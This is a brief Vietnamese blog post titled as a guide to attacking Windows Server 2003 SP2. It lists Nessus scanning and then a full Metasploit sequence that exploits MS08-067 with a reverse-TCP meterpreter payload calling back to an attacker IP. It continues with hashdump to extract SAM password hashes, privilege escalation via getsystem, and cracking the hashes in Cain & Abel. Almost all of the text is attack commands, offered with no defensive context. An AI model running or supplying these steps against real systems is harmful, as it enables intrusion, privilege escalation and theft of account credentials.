tan cong server 2003 sp2
1. Dung chuong trinh Nessus tren firefox: 127.0.0.1:8834
2. Scan de biet ip server dinh loi nao nghiem trong.
3. Dung session duoc mo de di vao server, dieu khien he thong.
4. Dung metasploit:
#msfconsole
#help
#search ms08_067 (tim thong tin ve loi da scan duoc)
#info xploit/windows/smb/ms08_067_netapi (tim thong tin)
#use exploit/windows/smb/ms08_067_netapi
#show options
#set RHOST [ip target]
#set LHOST [ip attacker]
#set PAYLOAD windows/meterpreter/reverse_tcp
#exploit (tien hanh khai thac loi)
#help (xem cac lenh mau khai thac tan cong victim)
#sysinfo (xem thong tin hdh)
#hashdump (lay noi dung file sam, giai ma pass)
#getprivs (enable process privileges)
#getsystem -h
-t 1 (leo thang dac quyen)
5. Lay file SAM voi lenh hashdump, bo vao chuong trinh Cain & Abel de crack password.
Không có nhận xét nào:
Đăng nhận xét